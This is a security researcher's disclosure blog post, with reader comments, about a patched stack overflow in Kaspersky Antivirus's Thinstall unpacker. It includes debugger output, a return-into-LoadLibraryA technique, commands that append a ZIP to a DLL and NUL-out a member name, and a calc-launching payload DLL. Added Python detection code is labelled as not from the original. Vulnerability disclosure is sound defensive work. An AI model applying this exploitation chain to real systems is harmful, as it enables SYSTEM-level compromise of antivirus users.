Tuesday, September 22, 2015

Kaspersky: Mo Unpackers, Mo Problems.

Posted by the notorious Tavis Ormandy.


We’ve talked before about how we use Google scale to amplify our fuzzing efforts. I’ve recently been working on applying some of these techniques to Antivirus, a vast and highly privileged attack surface.


Among the products I’m working on is Kaspersky Antivirus, and I’m currently triaging and analyzing the first round of vulnerabilities I’ve collected. As well as fuzzing, I’ve been auditing and reviewing the design, resulting in identifying multiple major flaws that Kaspersky are actively working on resolving. These issues affect everything from network intrusion detection, SSL interception and file scanning to browser integration and local privilege escalation.


Many of the reports I’ve filed are still unfixed, but Kaspersky has made enough progress that I can talk about some of the issues. One notable observation from this work was that some of the most critical vulnerabilities I’ve been submitting were simply too easy to exploit, and I’m happy to report that Kaspersky are rolling out some improved mitigations to resolve that.


Some of the bugs Kaspersky has already resolved include vulnerabilities parsing everything from Android DEX files and Microsoft CHM documents to unpacking UPX and Yoda’s Protector. We’ve sent dozens of reports to Kaspersky to investigate, any of which could result in a complete compromise of any Kaspersky Antivirus user.


Let’s examine one of the issues in more detail. For this first issue, if the release date of the definitions in Kaspersky Antivirus (or any other products using the Kaspersky engine, such as ZoneAlarm) is after 7-Sep-2015, then the vulnerability described below is already resolved.


Because antivirus products typically intercept filesystem and network traffic, simply visiting a website or receiving an email is sufficient for exploitation. It is not necessary to open or read the email, as the filesystem I/O from receiving the email is sufficient to trigger the exploitable condition.


Sample Vulnerability: Thinstall Containers


Thinstall containers are virtualization wrappers around applications to simplify distribution. The product was acquired by VMware in 2008 and renamed VMware ThinApp. Kaspersky attempts to unpack Thinstall version 4 containers to scan the contents when it encounters one. Thinstall applications can be recognised by the magic constants at their entry point.

pushf
pusha
push 0x6C417453
push 0x6E496854
call $+5
This code triggers the Thinstall unpacker in Kaspersky.
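As an added illustration (not code from the original post), the following Python decodes the five-instruction stub above from its raw bytes and checks for the two Thinstall magic constants, which is the kind of entry-point check a scanner performs before handing a file to an unpacker. The stub bytes are constructed here from the listing; how Kaspersky's own signature logic is written is not known and is not assumed.

```python
import struct

# Constructed from the listing above (32-bit x86 encodings):
# pushf = 9C, pusha = 60, push imm32 = 68 <imm32 LE>, call rel32 = E8 <rel32 LE>.
THINSTALL_STUB = bytes.fromhex("9C60685374416C685468496EE800000000")
THINSTALL_MAGIC = (0x6C417453, 0x6E496854)  # the two pushed constants


def disasm_entry_stub(code: bytes):
    """Decode only the instruction forms the stub uses; stop at anything else.

    Returns (listing, pushed_imm32s). This is a deliberately tiny decoder,
    not a general x86 disassembler.
    """
    listing, pushed, pos = [], [], 0
    while pos < len(code) and len(listing) < 5:
        op = code[pos]
        if op == 0x9C:
            listing.append("pushf")
            pos += 1
        elif op == 0x60:
            listing.append("pusha")
            pos += 1
        elif op == 0x68 and pos + 5 <= len(code):
            imm = struct.unpack_from("<I", code, pos + 1)[0]
            pushed.append(imm)
            listing.append(f"push 0x{imm:08X}")
            pos += 5
        elif op == 0xE8 and pos + 5 <= len(code):
            rel = struct.unpack_from("<i", code, pos + 1)[0]
            listing.append(f"call $+{5 + rel}")  # "call $+5" when rel32 == 0
            pos += 5
        else:
            break
    return listing, pushed


def is_thinstall_entry(code: bytes) -> bool:
    """True if the bytes at an entry point are exactly the Thinstall v4 stub."""
    listing, pushed = disasm_entry_stub(code)
    return (listing[:2] == ["pushf", "pusha"]
            and tuple(pushed) == THINSTALL_MAGIC
            and len(listing) == 5 and listing[4] == "call $+5")


def magic_as_ascii(pushed) -> str:
    """Show what the two pushes leave in memory: the last push lands at the
    lowest address, so reading upward from esp gives reverse push order."""
    return b"".join(struct.pack("<I", v) for v in reversed(pushed)).decode("ascii")
```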


Fuzzing Thinstall applications revealed a stack buffer overflow extracting the container contents. Because Kaspersky did not enable /GS, it is possible to overwrite the stack frame and redirect execution quite simply. Support for /GS was first introduced in Visual Studio 2002, and has been enabled by default for many years. It is possible to disable /GS in your build configuration, but it would be an exceptionally bad idea to do so.


By extracting the container record responsible for the overflow, it didn’t take long to reliably gain control of the instruction pointer.


(8f0.b28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0be4005c ecx=09f9d810 edx=00000000 esi=0be4005c edi=0d90ef64
eip=41414141 esp=09f9dc5c ebp=43434343 iopl=0         nv up ei pl nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010207
41414141 ??              ???
0:084> lmv m avp
start    end        module name
013d0000 01401000   avp        (deferred)             
   Image path: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 16.0.0\avp.exe
   Image name: avp.exe
   Timestamp:        Thu Jul 23 11:39:44 2015 (55B134F0)
   CheckSum:         00036438
   ImageSize:        00031000
   File version:     16.0.0.625
   Product version:  16.0.0.625
   File flags:       0 (Mask 3F)
   File OS:          40004 NT Win32
   File type:        1.0 App
   File date:        00000000.00000000
   Translations:     0409.04b0
   CompanyName:      Kaspersky Lab ZAO
   ProductName:      Kaspersky Anti-Virus
   InternalName:     avp
   OriginalFilename: avp.exe
   ProductVersion:   16.0.0.625
   FileVersion:      16.0.0.625
   FileDescription:  Kaspersky Anti-Virus
   LegalCopyright:   © 2015 Kaspersky Lab ZAO. All Rights Reserved.
   LegalTrademarks:  Registered trademarks and service marks are the property of their respective owners


Exploitation


Kaspersky have enabled /DYNAMICBASE for all of their modules, which should make exploitation unreliable. Unfortunately, a few implementation flaws prevented it from working properly. Multiple PAGE_EXECUTE_READWRITE mappings are created at predictable locations for dynamic code using VirtualAlloc().


0:117> !address 0x7e670000
Usage:                  
Base Address:           7e670000
End Address:            7e671000
Region Size:            00001000
State:                  00001000 MEM_COMMIT
Protect:                00000040 PAGE_EXECUTE_READWRITE
Type:                   00020000 MEM_PRIVATE
Allocation Base:        7e670000
Allocation Protect:     00000040 PAGE_EXECUTE_READWRITE


I dumped the contents of the pages using .writemem, and quickly found a stub for calling kernel32!LoadLibraryA.


0:001> u 0x7e670470
7e670470 58              pop     eax
7e670471 688f49db76      push    offset kernel32!LoadLibraryA (76db498f)
7e670476 c3              ret
7e670477 cc              int     3
7e670478 55              push    ebp
7e670479 8bec            mov     ebp,esp
7e67047b 81ecb0000000    sub     esp,0B0h
7e670481 833d5cff686800  cmp     dword ptr [ushata!UshataInitializeForService+0x1639c (6868ff5c)],0


This would be a useful primitive for exploitation if we could control the parameters, but there is no way to know where any useful strings are located. I guessed that the filename that’s being scanned must be somewhere on the stack. After dumping the stack with dda I found it at [esp+0x8f*4].


0:124> dda esp+8e*4 L1
0c85e4cc  0ba21fb8 "C:\exploit.txt"


Note that the filename or extension being scanned doesn’t matter; I used .txt.


If I could get the exploit to look like a valid DLL, I could return into LoadLibrary and get it to invoke DllMain(). This code would then be loaded into the address space of avp.exe and execute with NT AUTHORITY\SYSTEM privileges.


I built a simple chain to clear the stack and return into LoadLibraryA, and it worked beautifully.


0:124> dda esp L8f
0c85e294  00000000
0c85e298  7e670471 "h.I.v..U....."
0c85e29c  00000000
0c85e2a0  7e670471 "h.I.v..U....."
0c85e2a4  00000000
0c85e2a8  7e670471 "h.I.v..U....."
0c85e2ac  00000000
0c85e4c8  7e670471 "h.I.v..U....."
...
0c85e4cc  0ba21fb8 "C:\exploit.txt"


Unfortunately the Windows loader is very strict about the format of DLLs, and I was unable to get it to accept the exploit and still trigger the vulnerability in Kaspersky. This might be possible given more time, but I came up with an alternative strategy instead.


Channelling Corkami


I had already noticed that Kaspersky will scan archives appended to other files.


$ cat file.doc file.zip > newfile.doc


So in this case, Kaspersky would spot that a ZIP archive had been appended to an office document, and extract and scan the contents. I wondered if it was possible to put my exploit in a ZIP file, and then append it to a DLL, like this:


$ cat payload.dll exploit.zip > finalexploit.txt

This would mean Kaspersky would see the ZIP file appended to the DLL and then scan my exploit, but Windows would see a valid DLL. Note that filenames and extensions don’t matter here; it is perfectly legal to LoadLibrary(“anything.txt”).


I was able to trigger the exploit this way, but unfortunately the filename on the stack was now written differently! When scanning inside an archive, Kaspersky renders the filename like this:


C:\exploit.zip//exploit.txt


That is not a pathname that LoadLibraryA would accept. My solution was to modify the zip header to name the file “”, i.e. an empty string. When Kaspersky produces the filename it appends the empty string, and the result is still a valid target for LoadLibraryA.


I just used sed like this:


$ sed -i 's/e\(xploit.txt\)/\x00\1/' exploit.zip
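An added example (not from the original post) showing the detection side of the two tricks just described: it parses a ZIP's end-of-central-directory and central directory to find data prepended to the archive (the DLL it was appended to) and member names containing a NUL byte. The sample is constructed in memory; the "MZ" prefix is a placeholder standing in for payload.dll, not a real PE.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"  # end of central directory record
CDIR_SIG = b"PK\x01\x02"  # central directory file header


def analyse_zip_overlay(data: bytes) -> dict:
    """Inspect a possibly-appended ZIP for the two tricks used in the post.

    prefix_len: bytes in front of the archive. The EOCD stores the central
    directory offset relative to the archive start, so a ZIP appended to a DLL
    shows up as a mismatch between that offset and where the directory really is.
    nul_in_name / empty_name: member names a C-string API would cut short.
    """
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        return {"is_zip": False}
    # EOCD fields after the signature: disk, cd_disk, n_this, n_total, cd_size, cd_off, comment_len
    _, _, _, n_total, cd_size, cd_off, _ = struct.unpack_from("<HHHHIIH", data, eocd + 4)
    actual_cd = eocd - cd_size
    prefix_len = max(actual_cd - cd_off, 0)
    names, pos = [], actual_cd
    for _ in range(n_total):
        if data[pos:pos + 4] != CDIR_SIG:
            break
        # name/extra/comment lengths sit at offset 28 of the 46-byte header
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        names.append(data[pos + 46:pos + 46 + name_len])
        pos += 46 + name_len + extra_len + comment_len
    return {
        "is_zip": True,
        "prefix_len": prefix_len,
        "prefix_is_pe": prefix_len >= 2 and data[:2] == b"MZ",
        "nul_in_name": any(b"\x00" in n for n in names),
        "empty_name": any(n == b"" for n in names),
        "names": names,
    }


def build_sample(appended: bool = True, nul_name: bool = True) -> bytes:
    """Constructed sample. The prefix is an 'MZ' header plus padding standing in
    for payload.dll (not a real PE); the NUL replacement mirrors the sed command."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("exploit.txt", b"constructed placeholder content")
    archive = buf.getvalue()
    if nul_name:
        archive = archive.replace(b"exploit.txt", b"\x00xploit.txt")
    prefix = b"MZ" + b"\x00" * 126 if appended else b""
    return prefix + archive


def verdict(data: bytes) -> str:
    """Summarise the findings the way a scanner's logging might."""
    r = analyse_zip_overlay(data)
    if not r["is_zip"]:
        return "no zip"
    flags = []
    if r["prefix_is_pe"]:
        flags.append("zip appended to PE")
    if r["nul_in_name"] or r["empty_name"]:
        flags.append("member name unsafe for C strings")
    return "; ".join(flags) or "clean"
```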
I wrote a quick payload dll to load:


$ cat wrapper.c
#include <windows.h>

#pragma comment(lib, "shell32")

/* Entry point invoked by LoadLibraryA once the loader maps this file. */
BOOLEAN WINAPI DllMain(HINSTANCE hDllHandle, DWORD nReason, LPVOID Reserved)
{
   ShellExecute(NULL, "open", "calc", NULL, NULL, 0);
   ExitProcess(0);  /* terminate the host process instead of returning */
   return 1;
}

And the exploit worked beautifully first time.




I verified the exploit worked on versions 15 and 16 of Kaspersky Antivirus on Windows 7. Note that the calculator is displayed on the Service Desktop, so you will need to use Process Explorer to verify it was created.

Product Design Flaws


I’ve also reported some major design flaws in various other components of Kaspersky Antivirus and Kaspersky Internet Security. The patches for the remote network attacks I had planned to discuss here were delayed, and so I’ll talk about them in a second post on this topic once the fixes are live.


Security Software Considered Harmful?


We have strong evidence that an active black market trade in antivirus exploits exists. Research shows that it’s an easily accessible attack surface that dramatically increases exposure to targeted attacks.


Snippet of an exploit pricelist uncovered by WikiLeaks, source. The pricelist demonstrates that antivirus exploits and information are actively traded.


For this reason, the vendors of security products have a responsibility to uphold the highest secure development standards possible to minimise the potential for harm caused by their software.


Ignoring the question of efficacy, attempting to reduce one’s exposure to opportunistic malware should not result in an increased exposure to targeted attacks.


Conclusion


In future, we would like to see antivirus unpackers, emulators and parsers sandboxed, not run with SYSTEM privileges. The Chromium sandbox is open source and used in multiple major products. Don’t wait for the network worm that targets your product, or for targeted attacks against your users: add sandboxing to your development roadmap today.


I’ve previously written about Sophos and ESET, but plan to research other vendors soon.

Thanks to Kaspersky for record-breaking response times when handling this report; they’ve set a high bar to beat for other vendors! More Kaspersky issues, including multiple remote code execution vulnerabilities, should be fixed and visible in our issue tracker over the next few weeks.

17 comments:

  1. Amazing job Tavis! Congratulations.

    I think it's possible to see this kind of behavior not only in AV products, but in all kind of products that make some unpack things for analysis, no?

    Regards!

    Marco

    Replies
    1. > I think it's possible to see this kind of behavior not only in AV products, but in all kind of products that make some unpack things for analysis, no?

      Yes, just have a look at wireshark and how many security bugs they have.

  2. More brilliant work by T.O.

    Parsing of complex data files is a common source of vulnerabilities. Has anyone attempted to make a source code collection of secure file parsers for formats like CHM, DEX and UPX, not to mention PDF, all the graphics formats, etc.?

    >>Kaspersky did not enable /GS...

    WTF?!?! In fact, as the author goes on to say, it appears that Kaspersky actively disabled /GS.

    >>In future, we would like to see antivirus unpackers, emulators and parsers sandboxed, not run with SYSTEM privileges.

    Absolutely.

    Replies
    1. Most likely they had VS projects dating back to when /GS was not available, and importing them into a newer VS version left /GS off. I know it has happened to me as well.

  3. > I think it's possible to see this kind of behavior not only in AV products, but in all kind of products that make some unpack things for analysis, no?

    Yes, parsers anywhere can have bugs, but they're especially concerning in widely-used programs with system-level privileges that are expected to run on potentially malicious content.

  4. What do you mean by "Service Desktop"? Google search turned up no results for me.

    Replies
    1. Calc spawned by avp.exe is executed in a special services session and can't interact with the user's desktop.
      This started with Vista; XP and prior were able to interact with the desktop.

    2. Probably the "desktop" for the SYSTEM account on Windows, which you normally wouldn't be able to see. Another way to say it is that it's launched in the context of a different user.

    3. Every user in Windows has their own visible desktop, sometimes referred to as a shell. You can experience that with user switching (not logging off).
      The system is a separate user in every Windows system and has its own (usually not visible) desktop. On that desktop, belonging to the system user, the calculator is started. For example, UAC happens on that system desktop. During UAC a desktop switch occurs and a screenshot of the user desktop is displayed as a dark background picture, with only the message box asking for permissions shown on that system desktop.

    4. On Windows, services are prevented from accessing the user's desktop for security reasons. So for compatibility reasons, any service that tries to access the desktop automatically gets redirected to a special "desktop" specifically for that service, which you normally can't see but through some trickery can switch to and see whatever UI the service showed.

    5. The desktop associated with the service account (most likely LocalSystem or so), as opposed to the desktop named "Default" (minus quotes) that is the one the user sees (and user programs run on).
      See https://msdn.microsoft.com/en-us/library/windows/desktop/ms687105(v=vs.85).aspx

    6. The calculator itself can't be seen on the desktop, because it's being opened on the Desktop of the user account that runs the service.

    7. I think you have to look for "session 0 isolation"
      http://blogs.technet.com/b/askperf/archive/2007/04/27/application-compatibility-session-0-isolation.aspx

  5. Scanning files in a non-memory-safe language or outside of an effective sandbox is horrible. AV will scan files as soon as a flash drive is connected, so having AV installed is currently a bad idea if you care about security.

  6. [quote]This would mean Kaspersky would see the ZIP file appended to the DLL and then scan my exploit, but Windows would see a valid DLL. [/quote]

    Why would Windows "see" the valid DLL and then execute it from there? While Kaspersky (or any AV) is scanning, we expect it to read the data without executing it as code. I know it's code, but it should be assumed to be malicious and treated as data at least until scanning is finished. (Sorry, I'm not a Windows dev, but this is fundamentally bad, no?)

  7. Why is Windows automagically executing code that is being read to scan for malicious code? Windows just "sees" that it's a DLL (i.e. code) and then immediately executes it before the scanner can finish scanning? C'mon, that's bad!!!

    So, this payload seems like it could be delivered by spam as an innocent-looking .txt file, and the virus scanner will do the rest while scanning email attachments.

  8. Your exploit worked in Windows 7. Would it work in Windows 10 or with EMET installed and enabled?
